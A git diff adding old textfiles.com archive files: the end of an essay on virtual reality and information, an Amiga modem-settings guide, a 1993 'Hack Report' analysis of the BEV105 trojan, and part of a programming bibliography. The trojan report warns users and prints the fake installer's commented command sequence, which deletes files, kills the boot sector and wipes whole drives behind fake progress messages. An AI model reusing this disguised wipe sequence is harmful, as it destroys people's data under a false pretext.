by their +own realization. Yes, it will work for that purpose and it will be easy. +But the real point of Virtual Reality, as with life itself, is contact. +Contact with oneself alone is certainly a laudable enough goal, but the +presence of half a million dollars worth of equipment between that +subject and object is neither necessary nor desirable. + +Even if Virtual Reality turns out to provide the format for the ultimate +pornographic film...a "feelie" with a perfect body...it will serve us +better as the ultimate telephone. + + + +Life in the DataCloud +Scratching Your Eyes Back In + +There was a man who lived in town +And he was wondrous wise. +He jumped into a bramble bush +And scratched out both his eyes. +And when he saw what he had done, +With all his might and main, +He jumped back in the bramble bush +And scratched them in again. + + Old English Nursery Rhyme +Information is alienated experience. + + Jaron Lanier + +Since the Sumerians starting poking sticks into clay and claiming that +the resulting cuneiform squiggles meant something, we've been living +in the Information Age. Only lately did someone come up with a name +for it. I suppose that was because we quit making anything else of +value. Before that, they just called it civilization. + +Indeed, one could make a pretty good case that consciousness, as we +define it, arose simultaneously with the ability to communicate its +products symbolically. (See The Origin of Consciousness and the +Breakdown of the Bicameral Brain by Julian Jaynes for related +conclusions.) + +The Sumerians had a pretty clear perspective on what this stuff was +good for. The preponderance of their runic tablets turn out to be, on +translation, calendars, inventories, and mnemonic devices for such +data as one might need to remember but which was too trivial to merit +conversion into the other storage form of the era, epic poetry. They +didn't use it to describe anything. + +Perhaps they recognized that even the most mundane experience +would beggar any effort to describe it if one were serious about +creating a genuine simulation. + +The Egyptians didn't have any such illusions either, but, in addition to +keeping track of cubits and high water, they found symbols useful for +their elaborate liturgical purposes. With so many dramatis personae in +the pantheon, some method was required for sorting out each one's +ritualistic preferences. + +The Greeks, as was their wont, expanded the envelope further. To the +previously established (and sensible) uses for writing, they added +commentary, philosophy, calculation and drama. + +Still, they restrained themselves from attempting to simulate +experience on paper (or whatever it was they wrote on). One might +argue that drama was an effort to do that, but I think that the likes of +Sophocles probably just found it easier not to have to personally teach +his actors all their lines. + +As early as the 5th Century B.C. we hear the first warnings that +information might constitute an abuse of experience. Socrates +suggested that writing things down might damage your ability to +remember them in their proper, full-bodied form. (An admonition we +know about since Plato went ahead and wrote it down as soon as +Socrates was hemlocked out of the ability to stop him.) + +It wasn't until the 17th Century that things really got out of hand. +Cervantes wrote Don Quixote and fiction was born. From that point, +any experience could be plucked from its holy moment in time and +pressed like a flower in a book, to be reconstituted later in the +imagination of the reader. + +The thin, alphanumeric trickle that is language was suddenly thought +to be a acceptable surrogate for the boiling torrent of shapes, smells, +colors, sounds, memories, and context which amalgamate in the +cauldron of a human skull and become there something called Reality. +No longer did one have to "be there." One could read about it and get +the flavor well enough. + +This absurd delusion is now universal. The only reason anyone +believes it is that everyone does. + +I, on the other hand, began to have my doubts around the time I +started trying to create some of this magical information myself. +Sometime in the 4th Grade, I began to write about the things that +happened to me. For awhile, the approval others showed my efforts +was enough to inspire their continuation. + +Gradually, however, the effort became painful. The inadequacy of my +word-replicas for experience was increasingly clear. I tried poetry. +This seemed to work until I realized that it did so because a poem is +about itself and thus has no "real thing" to be compared to. + +Writing about something continues to cause me nothing but anguish. +The symbolic tools are hopelessly mis-matched to their three- +dimensional analogues. For example, the word "chair" is in no way +like any chair. + +Nor does it begin to imply the vast range of dissimilar objects to which +one might apply it. You can hop it up with adjectives... "big red +chair"...or additional phrases... "big red chair that Washington sat +in"...but the result is usually bad writing without much advancement +of your cause. I mean, "the big, deeply red, densely-brocaded, +Georgian love seat that Washington sat in while being bled by leeches" +is still, for all its lugubrious mass, not a chair. + +And if it were, it wouldn't move in the way that real things do even +when they're standing still. Words just sit there. Reality vibrates and +hums. I have a pet phrase for this element of the mismatch: Using +words to describe an experience is like using bricks to build a full- +sized, operational model of a fog bank. + +Perhaps it was a subliminal recognition of this fact that caused +America to fall in love with statistics. As a descriptive tool, numbers +are even worse than words. They are very purely themselves and +nothing else. Nevertheless, we now put everything from flowing +water to the human psyche into these rigid numerical boxes and are +especially straight-faced as we claim it fits in them. + +In doing this, we usually follow a rule I call, with characteristic +modesty, Barlow's Law of Real Numbers. This states that the +combination of any two speculative numbers by any arithmetic +operation will always yield a real number. The more decimal places +the better. + +Computers have hardly been part of the solution in this area. We pass +our measuring grids over pulsating reality, shovel the results into our +machines, thrash them with micro-circuits, and pretend that what +floats up to the screen is "real." + +Horseshit. + +What computers can do, and have done to a fare-thee-well, is to +provide us with a hyper-abundance of such processed lies. Everything +from U.S. News and World Report to Penthouse is now a dense thicket +of charts, tables, graphs, and %'s. All purporting to tell us something +about what is. + +But it's all just information. Which, apart from the fact that it's not to +be confused with experience, has several problems which Jaron Lanier +succinctly enumerated for me: "The first problem is that it's in- +formation. The second problem is that it's linear information. And the +third problem is that it's false information." + +Or, as we say in Wyoming, "Figures don't lie, but liars can figure." + +Virtual Reality is probably not going to cure this nonsense any more +than television, its one-way predecessor, has done. The global supply +of words, numbers, statistics, projections, analyses, and gossip...what I +call the DataCloud... expands with thermonuclear vigor and all the +Virtual Reality we can manufacture isn't going to stop that. + +But it may go a long way toward giving us means to communicate +which are based on shared experience rather than what we can +squeeze through this semi-permeable alphanumeric membrane. If it +won't contain the DataCloud, it might at least provide some +navigational aids through it. + +Maybe it can scratch our eyes, blinded by information, back in again. + + + diff --git a/textfiles.com/computers/best.cps b/textfiles.com/computers/best.cps new file mode 100644 index 00000000..f1f88257 --- /dev/null +++ b/textfiles.com/computers/best.cps @@ -0,0 +1,351 @@ + +***************************************************************************** +* * +* FIRE Starter : Get the BEST out of JRCOMM and your DUALST 14.4k Bds * +* * +***************************************************************************** +----------------------------------------------------------------------------- + + + a + + '' __ - -__ + _\ /> / /> / / + _ /_ _ _ _ ___ _ + |_)|_) | | | \ | | | | | | | |\ | `` 19 may 1991. + | | \ |_| |_/ |_| |_ | | |_| | \| + + (c) 1991 Text Files. Call TRADE-LINE. + The Fastest CANADIAN ELITE AMIGA BBS. + [ 514 ] 966-1133. 14,400 BDS. 395 MEGS. + + + + + + + + + + + + + + + + + + +---------------------------------------------------------------------------- +TEXT CREATED BY THE SPIRIT (MONTREAL,CANADA) +---------------------------------------------------------------------------- +- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +The REAL Best Settings for a DUAL STANDARD V42 BIS. (USERS VERSION) +- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + +This settings where not designed for SysOp. + +If you have a DUAL STANDARD and use JRCOMM, then read the whole file. +If you have a HST, then skip the DUAL STANDARD settings. +This file will tell you how to configure your DUAL STANDARD and/or +JRCOMM X.X (Tested on version 1.02a) for ULTIMATE Speeds. + +I don't have the Super Fat Agnus, so I can't try anything in PAL +mode. I have heard that CPS are quite faster using a PAL mode.. +Well, try it out if you have the chip, you have nothing to loose! + +It's amazing the number of LAME text files & TOP, ULTIMATE, BEST, K-RAD +CPS utility we see each day (almost) floorishing in our ware list.. +Believe me, with this, if you have the configuration I talked about, +YOU CANNOT HAVE BETTER CPS. Period. I made a LOT of tests.. +And that is the best configuration I got. + + + +NOW PRESS CONTROL+C and LOAD JRCOMM! (or stop a new CLI) + +--------------------------------------------------------------------- +JRCOMM PART +--------------------------------------------------------------------- + +FILE TRANSFER PARAMETER MENU +**************************** + +EVERYTHING OFF.. Except : + ZMODEM (when will we get a NEW protocol???) + Don't care + Expand Blanks + Resume Transfer (useful!) + Auto Download + Auto D/L challenge + 32 Bit CRC + Binary Mode + Save Aborted (saves the file even if aborted) + Relaxed Timing + Overdrive + +SERIAL MENU +*********** + +EVERYTHING OFF.. Except : + + 19,2k (Why the HELL use 38.4k on 68000 machines? + And besides, the REAL 38.4k modems aren't + even out yet!) + 8 + None + 1 + Full + + +MODEM MENU +********** + + ATZ^M for the Init Command (Why RECONFIGURE + when everything is the NRAM?? ) + ~~+++~~ATH^M (Why put THREE ~ when it works + with two, it's faster when + ya need to hangup! hehe) + | + |__\ Well of course, you can + / always use the VOICE/DATA + or a LIGHTNING fast hang up. + +The rest of this menu is up to you. It won't affect the speed in any way. +(The Hangup function of course does not alter the speed, but since I'm +writing this text, I might give ya some hints on other option.. eh?).. + + +TERMINAL MENU +************* + +Bahaha.. There is NOTHING to change in here. I like the people who +actually think putting 2 color will speed up the transfer, NO IT +WON'T! Not even by 1 CPS!! Not even 0.000001 CPS! Another rumour.. + +(Yeh, Like the CLOCK VIRUS thing.. :-) ) + + +GENERAL MENU +************ + +CTS/RTS handshake on (of course) +Disk Check (nothing to do with speed, but it's nice to see automatically + when you download if the file will fit on your d/L directory) +Task Priority ---> 15 <--- Yes! 15.. It's the HIGHEST.. It will slow + down your machine LIKE HELL. But it will + avoid 99% of the ZRD32, GARGAGE and other + shitty errors coming in and SLOWING everything + down. You can put this to 0 if you want, you'll + be able to multitask, but the transfers won't + be so kickin! You'll might ERRORS & lower CPS.. + +Transfer Buffer Size --> 6 <-- This should not be put to anything else. + It's the RIGHT balance. If you put too much + buffer size, it means that when there is + an errors, it will have to send all the + buffer all over. If it's too small, it won't + help either. I made a LOT of tests on that + particular option, so put it to that value! + +GMT Offset --> 0 <-- + + + + + + + + + +SOME HINTS.......... +--------------------- + +There you go with JRCOMM! I use the IBEUMA-ZINC.FONT made by my friend, +Marc Dionne. I feel It's the BEST looking font when BBS'ing. It allows +a perfect display of IBM ANSI Codes and AMIGA ANSI Codes without any problem, +and it looks quite good. I included it in the archive. Just take +IBEUMA-ZINC.font and move it to your FONTS: directory and create a +directory in there called IBEUMA-ZINC and put the little "8" thing.. +(3188 BYTES). + +Another neato thing.. + +Go in the TERMINAL Menu and change the TEXT #.. Put it to 5 or something. +Then go in your palette menu (use 8 color in IBM mode by the way, that +way you will see NICE looking ANSI, IBM 100% and AMIGA 100%) and change +the FIFTH color. Put it to WHITE. Then modify the FIRST color (which is +white, and put it to something like BLUE!). When you will download, +you won't have that dirty looking WHITE window, you will have a kool +blue or whatever color window you want. + +Adjust the other colors to your own taste (call several boards), +DON'T USE THE DEFAULT IBM COLORS, they SUCK shit!! Put more INTENSITY +and use different colors if you want.. But you'll have to EDIT all your +JRCOMM Phone Book and adjust the colors after too.. That's a pain. So +make sure you REALLY like your colors be4 re-creating your phone book. + +Would be NICE if J. RADIGAN could put an AUTO COLOR adjusts for every +phone book entry.. As soon as you change the DEFAULT Jrcomm.def palette, +it would adjusts all the other entry (this would be an OPTION.. ). +Would have saved ME and other guys some time fer sure!! + + + + + + + + + + + + + + + + +-------------------------------------------------------------------------- +PREFERENCES Best Settings +-------------------------------------------------------------------------- + +Use the PREF program I included in the ARCHIVE. It's a must. I wonder +if you don't have it already. Go in your prefs, then click on the serial +menu and put 31250 for the Baud speed and 16384 for the buffer. Everything +setted out for maximum input. The buffer will be reduced by JRCOMM after +(to 6 like I said), so it doesn't really matter. Same thing for the baud. + +Save out everything and go back into your JRCOMM. + + + + + + + + + + + + + + + + + + + + + +------------------------------------------------------------------------- +DUAL STANDARD Best Settings +------------------------------------------------------------------------- + +Type ATI5.. + +Then adjust all options to those ones : + + +ati5 + +USRobotics Courier 14400 HST Dual Standard NRAM Settings... + + DIAL=TONE B0 F1 M1 X3 + BAUD=19200 PARITY=N WORDLEN=8 + + & A3 & B1 & G2 & H1 & I0 & K1 & L0 & M4 & N0 + & P0 & R2 & S0 & T5 & X1 & Y1 % R0 + + S02=043 S03=013 S04=010 S05=008 S06=001 + S07=060 S08=003 S09=006 S10=007 S11=036 + S12=050 S13=000 S15=000 S19=000 S21=010 + S22=017 S23=019 S24=150 S26=001 S27=000 + S28=008 S29=020 S32=001 S33=000 S34=000 + S35=000 S36=000 S37=000 S38=007 + + STORED PHONE #0: (514) 966-1133 + #1: (514) 966-1133 + #2: + #3: + +OK +ati4 + +USRobotics Courier 14400 HST Dual Standard Settings... + + B0 C1 E1 F1 M1 Q0 V1 X3 + BAUD=19200 PARITY=N WORDLEN=8 + DIAL=HUNT ON HOOK TIMER + + & A3 & B1 & C1 & D2 & G2 & H1 & I0 & K1 & L0 + & M4 & N0 & P0 & R2 & S0 & T5 & X1 & Y1 % R0 + + S00=000 S01=000 S02=043 S03=013 S04=010 + S05=008 S06=001 S07=060 S08=003 S09=006 + S10=007 S11=036 S12=050 S13=000 S14=001 + S15=000 S16=000 S17=001 S18=000 S19=000 + S20=000 S21=010 S22=017 S23=019 S24=150 + S25=000 S26=001 S27=000 S28=008 S29=020 + S30=000 S31=000 S32=001 S33=000 S34=000 + S35=000 S36=000 S37=000 S38=007 + + LAST DIALED #: T9661133 + +OK + +Then you do AT&W to save everything out. + +Ya can change the ATS11 for SPEED DIALING.. Well at 36, it's VERY QUICK! +(In fact, it can't be quicker for my place, In Montreal!) + +The ATS6 thing (1) is the delay between the DIAL TONE & the ACTUAL +Dialing.. + +__________________________________________________________________________ +########################################################################## +-------------------------------------------------------------------------- + +This is the END of the Text file! Was short & sweet. Now that you are +ready to get KICKIN speeds, dial up my Board... + +( 514 ) 966-1133 + +It's known as the F A S T E S T amiga bbs in CANADA. Only ELITE will +be allowed. + +Hope this file will help several users out there! + +Later! +__________________________________________________________________________ +########################################################################## +-------------------------------------------------------------------------- +Greetings go out to : (no order) + + Andeveron, Professor, The Raven, DOC, Spread(s) + Ti-Bob, Mega Man, Stingray, Raj Dood, Lone Wolf, + Aries, Solo, Beowulf, Sycon (sorry man!), Animal, + Elektra (Call our system! H/P base!), HellRat, + Bernard/SkyMan, Etrop, Capricorn, Problem Child, + Lazarus Long, Creative Impulse, King Cobra, + The Omega, The Drummer, The Kid, The Adept, + Tomcat, The Dream Warriors (Canada), Devious Doze, + and all others I know! + + + + a + + '' __ - -__ + _\ /> / /> / / + _ /_ _ _ _ ___ _ + |_)|_) | | | \ | | | | | | | |\ | `` 19 may 1991. + | | \ |_| |_/ |_| |_ | | |_| | \| + + (c) 1991 Text Files. Call TRADE-LINE. + The Fastest CANADIAN ELITE AMIGA BBS. + [ 514 ] 966-1133. 14,400 BDS. 395 MEGS. + ~~~ ~~~~~~~~ + + + diff --git a/textfiles.com/computers/bev105.res b/textfiles.com/computers/bev105.res new file mode 100644 index 00000000..6251a03c --- /dev/null +++ b/textfiles.com/computers/bev105.res @@ -0,0 +1,235 @@ + ========================================================================= + || + From the files of The Hack Squad: || by Lee Jackson, Co-Moderator, + || FidoNet International Echo SHAREWRE + The Hack Report || Volume 2, Number 3 + File Test Results || Result Report Date: March 7, 1993 + || + ========================================================================= + + ************************************************************************* + * * + * The following test was performed by and the results are courtesy * + * of Jeff White and Bill Logan of the Pueblo Group in Tuscon, * + * Arizona. Their assistance is greatly appreciated. * + * * + ************************************************************************* + + + File: BEV105.ARJ + Size: 79858 + Date/time: 1-15-93 5:09p + + Description: + + BEV is described by the scant documentation as a Beverly Hills 90210 + Adventure DOOR game for WWIV BBSes. It claims to have dialogue from the + actual TV show, and permission from The Fox Network to use such dialogue. + + ========================================================================= + + Synopsis: + + Apparently this was a batch file compiled to an COM file. It renames + several of the files included with the archive to programs and executes + them. It is dependent on these programs to do the destruction. + + Running the INSTALL.COM program to begin installation produces the + following screen: + + Welcome to the 90210 Door Installation Program for WWIV + Copyright 1992(c) Brian Deborus of Constalion BBS 1@2723 + + This Program will Depact all the files neccesary to run + the door, including the documentation to run the door. + The door will run on all WWIV systems using CHAIN.TXT. + The program will give you frequent updates on installation + by means of a percentage. + + Please Make sure when you typed Install you did it in this format + INSTALL [drive/path] of where you want the door. + Strike any key when ready... + + But what is actually happening is outlined below: + + Renames DORINFO.DIR to IDCKILL.EXE + Invokes IDCKILL to kill files on current drive with the extensions of: + BAT, FON, COM, ICE, ZIP, ANS, SYS, SUB, DAT, ARJ, EXE, and C + Renames DISK_1.VOL to BOOTKILL.EXE + Invokes BOOTKILL to kill BOOT record on current drive + Renames 90210.DIR to REBOOT.COM + Invokes IDCKILL to delete *.* on C:, D:, and E: drives + Invokes REBOOT.COM to reboot your computer after "installation" + + The author of this trojan added some "filler" to the archive by renaming + some common programs to .DIR files and including them with the archive + under the guise of being related to the DOOR game. Examples: + + MAIN.DIR + + This is actually BBSBASE, a common program used by Sysops to keep BBS + lists. + + Screen cut: + + ßßßßÜ ßßßßÜ Û ßßßßÜ ßßßßßÜ Û Üßßß + Û ÜÜß Û ÜÜß ßÜÜ Û ÜÜß Û Û ßÜÜ Û + Û Û Û Û ßÜ Û Û Û ßßßÛ ßÜ Û ßß + ÛÜÜÜß ÛÜÜÜß ÜÜÜÜÜß ÛÜÜÜß Û Û ÜÜÜÜÜß ßÜÜÜ + + Version 1.00 (c) 1988 + User Supported Software + + If you are an avid BBSer like me, you know what it feels + like to try and organize all those BBS names and numbers + that you constantly collect. At first, I tried to use index + cards, but that got really out of hand. + So, I wrote this program to keep track of those myriad of + numbers and names that once collected on my desk. The power + of this program is simply amazing. I have included alot of + extras in this program that would take for hours to do by hand + I have tried to keep it as user friendly as possible too. + + Written in Turbo Pascal Version 3.0 by Steve Lutz + + P R E S S A N Y K E Y T O C O N T I N U E + + CHAR.DIR + + This is evidently an auto-extract and/or install program for another + program. The GENESIS.EXE file does not come with BEV105, so the program + just errors out. + + Screen cut: + + AutoLHarc 1.15 (c)Yoshi, 1988-1990. + + Extract from : 'GENESIS.EXE' + Melting : 'GENESIS.COM' + o............................................... + + Error In Archive. + + DOCS.DIR + + Unknown. This is a program, but invoking it does not bring any response. + + ========================================================================= + + Contents: + + ARJ 2.30 Copyright (c) 1990-92 Robert K Jung. Jan 19 1992 + NOT REGISTERED for business, commercial, or government use. + + Processing archive: C:\SUSPECT\BEV105.ARJ + Archive date : 1993-01-15 17:10:04 + Sequence/Pathname/Comment + Rev Host OS Original Compressed Ratio DateTime modified CRC-32 + ============ ========== ========== ===== ================= ======== + 001) DORINFO.DIR + 3 MS-DOS 4135 1996 0.483 92-08-28 18:27:52 4BE0E6FE + 002) README.1ST + 3 MS-DOS 1414 750 0.530 93-01-15 17:09:38 9A392726 + 003) 90210.DIR + 3 MS-DOS 16 16 1.000 92-08-28 23:07:14 6D232072 + 004) CHAR.DIR + 3 MS-DOS 21108 16675 0.790 92-08-28 19:02:54 8B911883 + 005) MAIN.DIR + 3 MS-DOS 63733 30221 0.474 92-08-28 19:02:40 FE66BA29 + 006) DISK_1.VOL + 3 MS-DOS 96 96 1.000 92-08-28 02:03:36 6ABF751F + 007) DOCS.DIR + 3 MS-DOS 39408 25166 0.639 92-08-28 16:58:50 0230EF50 + 008) INSTALL.COM + 3 MS-DOS 41088 3343 0.081 92-08-28 16:22:02 A5FEE2C8 + ============ ========== ========== ===== + 8 files 170998 78263 0.458 + + ========================================================================= + + File Validations: + + File Name: 90210.dir Size: 16 Date: 8-28-1992 + File Authentication: Check Method 1 - 70EC Check Method 2 - 0565 + + File Name: char.dir Size: 21,108 Date: 8-28-1992 + File Authentication: Check Method 1 - FF27 Check Method 2 - 0039 + + File Name: disk_1.vol Size: 96 Date: 8-28-1992 + File Authentication: Check Method 1 - AB28 Check Method 2 - 0510 + + File Name: docs.dir Size: 39,408 Date: 8-28-1992 + File Authentication: Check Method 1 - B9B0 Check Method 2 - 1C92 + + File Name: dorinfo.dir Size: 4,135 Date: 8-28-1992 + File Authentication: Check Method 1 - 8930 Check Method 2 - 0F58 + + File Name: install.com Size: 41,088 Date: 8-28-1992 + File Authentication: Check Method 1 - 6D5A Check Method 2 - 1ED0 + + File Name: main.dir Size: 63,733 Date: 8-28-1992 + File Authentication: Check Method 1 - 5572 Check Method 2 - 0A7D + + File Name: readme.1st Size: 1,414 Date: 1-15-1993 + File Authentication: Check Method 1 - B6DD Check Method 2 - 1DEC + + ========================================================================= + + Viral activity: None detected + + ========================================================================= + + Suspect code: + + Here is an extract directly from the INSTALL.COM file which shows the + path of destruction. Comments were added by myself to point out what is + going on line-by-line. + + /C REN Dorinfo.dir idckill.exe <-- REN DORINFO.DIR to the IDCKILL + program + IDCKILL *.bat [a] <-- Kill all BAT files + Exploding Files - (10%) <-- Let user think installation is + 10% done + IDCKILL *.fon [a] <-- Kill any FON (phone) files + IDCKILL *.com [a] <-- Kill all COM files + Exploding Files - (25%) <-- Let user think installation is + 25% done + IDCKILL *.ice [a] <-- Kill all ICE files + IDCKILL *.zip [a] <-- Kill all ZIP files + Exploding Files - (40%) <-- Let user think installation is + 40% done + IDCKILL *.ans [a] <-- Kill all ANS files + IDCKILL *.sys [a] <-- Kill all SYS files + IDCKILL *.sub [a] <-- Kill all SUB files + IDCKILL *.dat[a] <-- Kill all DAT files + Exploding Files - (50%) <-- Let user think installation is + 50% done + IDCKILL *.arj [a] <-- Kill all ARJ files + IDCKILL *.c [a] <-- Kill all C files + Exploding Files - (60%) <-- Let user think installation is + 60% done + IDCKILL *.exe [a] <-- Kill all EXE files + Exploding Files - (85%) <-- Let user think installation is + 85% done + /C REN DISK_1.VOL bootkill.com <-- REN DISK_1.VOL to the BOOTKILL + program + BOOTKILL@ <-- Execute BOOTKILL to kill + BOOT sector + /C REN CHAR.DAT Genesis.EXE <-- REN CHAR.DAT to the GENESIS.EXE + program + Exploding Files - (95%) <-- Let user think installation is + 95% done + /C REN 90210.DIR reboot.com <-- REN 90210.DIR to REBOOT.COM program + Exploding Files (DONE!) <-- Let user think file expansion is done + Building Excutable Files.. Please Wait.. (May take up to 5 minutes) + IDCKILL *.* [a] <-- Erase all of DRIVE C: + /C c: + IDCKILL *.* [a] <-- Erase all of DRIVE D: + /C d: + IDCKILL *.* [a] <-- Erase all of DRIVE E: + /C e: + IDCKILL *.* [a] <-- Erase all of current drive + Program Finished... Beverly Hills 90210 door install complete! + REBOOT@ <-- Reboot computer + + ========================================================================= diff --git a/textfiles.com/computers/biblio.lst b/textfiles.com/computers/biblio.lst new file mode 100644 index 00000000..21067562 --- /dev/null +++ b/textfiles.com/computers/biblio.lst @@ -0,0 +1,659 @@ +Bibliography Release 49 Last change 2/11/96 +Copyright (c) 1989,1990,1991,1992,1993,1994,1995,1996 Ralf Brown +--------!---BIBLIOGRAPHY--------------------- +Information on Tseng/Ahead/Paradise EGA video modes from a list posted by +Dan Kegel 3/87. + +Information on the INT 10h functions supported by the EGA BIOS was derived +from the article "Graphic Enhancement" found in the April 1985 _PC Tech +Journal_, pages 58ff., and is marked with the string (EGA). jrh. + +Information on functions unique to the Portable PC and the Convertible was +derived from a similar list compiled by David E. Powell, and added by +Ralf Brown 11/14/87. + +Information on LIM EMS 3.2 functions was derived from _Advanced_MSDOS_, by +Ray Duncan. Added by Ralf Brown 11/19/87. + +Information on LIM EMS 4.0 functions was derived from the transcription of +the specification by Dick Flanagan. Added by Ralf Brown, 11/20/87. + +Some of the information on MCGA/VGA BIOS calls was derived from _Byte_, +Volume 12 Number 12. + +Various and sundry info on which machines support which calls was derived from +the BIOS comparison in _Byte_, Volume 12 Number 12 and added by Ralf Brown, +1/4/88. + +COMPAQ DOS 3.31 INT 25/26 from a posting by John Lefor, 1/25/88. + +TopView INT 15/AH=12h info from macro definitions by Daniel T. Travison Jr. +Added 3/4/88. Some additional TopView INT 15 info gleaned from "glue" routines +by John Navas. + +Quarterdeck's flyer on its overpriced API specs and tools provided sufficient +clues as to functionality to allow figuring out a large number of DESQview +INT 15h calls. + +MS Mouse driver calls derived from PC Magazine, Vol 6 #13. Added 3/29/88. + +Non-video PS/2 BIOS calls derived from _IBM_ROM_BIOS_ by Ray Duncan. +Added by Ralf Brown, 7/6/88. + +EEMS function calls derived from PC Tech Journal, May 1987. Added by Ralf +Brown, 7/11/88. + +The list of functions used by Novell NetWare was taken from Novell's +"NetWare Function Call Reference". + +PC Mouse information derived from the "PC Mouse Reference Manual version 4.00" + +10-Net INT 6Fh information derived from "10-Net Reference Manual version 2.0" + +APPC/PC INT 68h information derived from "Advanced Program-to-Program +Communication for the IBM Personal Computer, Programming Guide", second +edition, Dec 1986. + +CD-ROM function call information derived from "Microsoft MS-DOS CD-ROM +Extensions Function Requests", dated May 28, 1988. Added by Ralf Brown, +9/19/88. + +Novell NetWare function names from a 9/23/88 post by Marc Guyott +. Added by Ralf Brown, 9/30/88. + +Miscellaneous data structures contributed by Helmut Waelder derived from +descriptions in _MS-DOS_Encyclopedia_. + +Additional 10-Net INT 6F info from 10-Net version 3.3.10. + +Additional Novell NetWare info from "Advanced NetWare 2.0 Reference". + +Three miscellaneous calls from an info package by Dave Williams. I do wish +he'd given this list more credit than + "various text files downloaded from BBS systems - INTERRUP.ARC, BIOSDOS.ZOO, + DOSINFO.ARC, DOSERROR.DOC, DOSTIPS.TXT, etc." +considering that most of his interrupt listing is derived from this one (a +majority of that with only formatting changes), AND he's asking a $15 shareware +registration [newer versions do give better credit]. + +Compaq speed setting calls derived from the Compaq DeskPro 386 Technical +Reference Guide. + +TesSeRact RAM-resident API calls derived from the documentation to the +TesSeRact library v1.0, available on BBSs as TESS_10.ARC. Added by Ralf Brown, +11/29/88. + +Various extended VGA video modes from PC Tech Journal, Jan 1989. Added by Ralf +Brown, 1/6/89. + +HLLAPI functions derived from PC Tech Journal, Jan 1989. Added by Ralf Brown, +1/7/89. + +Virtual Control Program Interface functions derived from "Virtual Control +Program Interface, Revision 1.0, December 1987", copyright Phar Lap Software +and Quarterdeck Office Systems. Added by Ralf Brown, 2/21/89. Available for +free by writing to Bob Moote, VCPI Coordinator, Phar Lap Software, Inc., +60 Aberdeen Ave, Cambridge, MA 02138. + +DOS 4.0 calls submitted by Helmut Waelder are largely derived from _Advanced_ +_MSDOS_Programming_, by Ray Duncan, Second Edition. + +pcANYWHERE API functions derived from the pcANYWHERE v2.10 User's Guide. 4/7/89 + +Communicating Applications Specification API derived from "DCA/Intel +Communicating Applications Specification, Version 1.0A", Sep 1988, copyright +Digital Communications Associates, Inc and Intel Corp. Added by Ralf Brown, +4/18/89. Available on Intel's BBS at 503-645-6275. + +Image Processing Interface API derived from "Intel Image Processing Interface +Specification, Version 1.0", copyright 1989 Intel Corp. Added by Ralf Brown, +4/19/89. Available on Intel's BBS at 503-645-6275. + +More TesSeRact RAM-resident API calls derived from the documentation to the +TesSeRact library v1.1. Added by Ralf Brown, 4/30/89. + +CD-ROM 2.10 function calls derived from "Microsoft MS-DOS CD-ROM Extensions +Function Requests Specification, 29 March 1989". Added by Ralf Brown, 6/2/89. + +Video7 VGA extended INT 10 calls derived from Video Seven VGA Technical +Reference Manual, dated 6/30/88. + +Additional video modes gleaned from configuration file for FRACTINT v8.0. +Added by Ralf Brown, 6/26/89. + +A variety of notes inspired by the 12/16/88 version of the MSDOS reference +by Dave Williams. Added 7/30/89. + +Additional video modes gleaned from configuration file for VPIC v2.0. Added by +Ralf Brown, 9/2/89. + +Btrieve API derived from the Btrieve Reference Manual, Rev. 2.0. Added 9/7/89. + +The Hercules GraphX manual, edition 2.1. Aug 1986, was used to fill in gaps +in coverage. Info added 9/7/89. + +Banyan VINES info summarized from _VINES_Programmer's_Interface_(DOS)_, June88 +revision, provided by Barry Burke . +Added by Ralf Brown, 11/89. + +ZIPKEY programmatic interface extracted from ZIPKEY documentation. Added by +Ralf Brown, 12/15/89. + +File sharing behavior from July 1987 PC Tech Journal. Added by Ralf Brown, +12/21/89. + +Inset API derived from "Inset Extended Specification" 11/23/88 by Inset Systems +Added 1/4/90. + +EMS4 hardware configuration info data format cribbed from +"MS-DOS Extensions Quick Reference" by Ray Duncan. Added 1/4/90. + +PC-IPC API from PC-IPC documentation. Added by Ralf Brown, 1/5/90. + +Imtec and Genoa 6400 video modes from VPIC v2.3 config files. Added by Ralf +Brown, 1/12/90. + +LANtastic API info derived from "LANtastic (tm) Network Operating System +Technical Reference Manual", provided by Edwin Floyd <76067.747@CompuServe.COM> +Added by Ralf Brown, 1/90. + +Phar Lap 386/DOS-extender API extracted from Phar Lap's manual. Added 1/90. + +IBM 3270 Workstation Program API derived from "IBM 3270 Workstation Program +Version 1.10, Programming Guide", dated December 1987. Added 2/90. + +VESA SuperVGA BIOS extensions derived from Dr. Dobb's Journal, April 1990. +Added by Ralf Brown, 3/25/90. + +Additional undocumented DOS 4 info gleaned from _Developing_Applications_Using_ +_DOS_, by Christopher, Feigenbaum, and Saliga. Added by Ralf Brown, 3/29/90 +and 3/31/90. + +TAME v2.30 data structure provided by David G. Thomas. Added 5/26/90. + +OS/386 API call names extracted from _Extending_DOS_ by Ray Duncan et al. +Added by Ralf Brown, 5/27/90. + +Network Driver Interface Specification 2.0.1 calls extracted from the May 18, +1990 draft of the spec. Added by Ralf Brown, 6/7/90. + +Additional Phar Lap 386/DOS-Extender calls extracted from _Extending_DOS_. +Added by Ralf Brown, 6/8/90. + +Even more video modes derived from VPIC 2.8 configuration files. Added by +Ralf Brown, 6/8/90. + +DOS Protected Mode Interface version 0.9 API from the May 15,1990 version of +the specification. Intel Corp. order number 240763-001. Added by Ralf Brown, +July 13-14, 1990. + +MSWindows INT 2F/AH=16h info gleaned from Microsoft Windows 3.0 Device Driver +Kit and the March 1990 issue of Computer Language. Added 7/17/90. + +Tseng ET4000 chipset mode info from _ET4000_Graphics_Controller_Data_Book_ by +Tseng Labs, Inc., Newtown, PA (215)968-0502. Added 7/25/90. + +Additional Packet Driver API calls extracted from version 1.09 of the "PC/TCP +Packet Driver Specification" Sept 14, 1989, by FTP Software, Inc., +26 Princess St, Wakefield, MA 01880-3004. Added by Ralf Brown, 8/29/90. + +Additional Netware 3.01 shell calls from "Professional Development Series +Bullets" Volume 2, Number 5 (June 1990). Added 9/90. + +Video FOSSIL INT 14 API extracted from Fidonet document FSC-0021 version 1.00 +by Rick Moore, dated May 23, 1988. Added by Ralf Brown, 9/12/90. + +Additional DESQview API info (mostly for v2.2+ calls) extracted from +_DESQview_API_Reference_, provided by Quarterdeck Office Systems,150 Pico Blvd, +Santa Monica, CA 90405. Added by Ralf Brown, 9/90. + +LANtastic v3.0 calls derived from the online "LANtastic (tm) Network Operating +System Technical Reference Manual", file date 6/13/90. Added by Ralf Brown, +10/6/90. + +Additional DECnet DOS INT 69/INT 6A info derived from the "DECnet DOS 